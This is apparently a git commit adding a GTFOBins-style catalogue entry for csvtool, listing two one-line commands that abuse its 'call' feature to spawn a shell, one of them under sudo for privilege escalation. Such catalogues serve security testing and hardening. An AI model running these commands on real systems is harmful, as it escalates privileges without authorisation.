Add csvtool

This commit is contained in:
F.Romero 2021-03-17 22:50:42 +01:00 committed by GitHub
parent b9ef170f4c
commit 9431dd9daf
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

7
_gtfobins/csvtool.md Normal file
View File

@ -0,0 +1,7 @@
---
functions:
shell:
- code: csvtool call '/bin/sh -p;false' /etc/passwd
sudo:
- code: sudo csvtool call '/bin/sh -p;false' /etc/passwd
---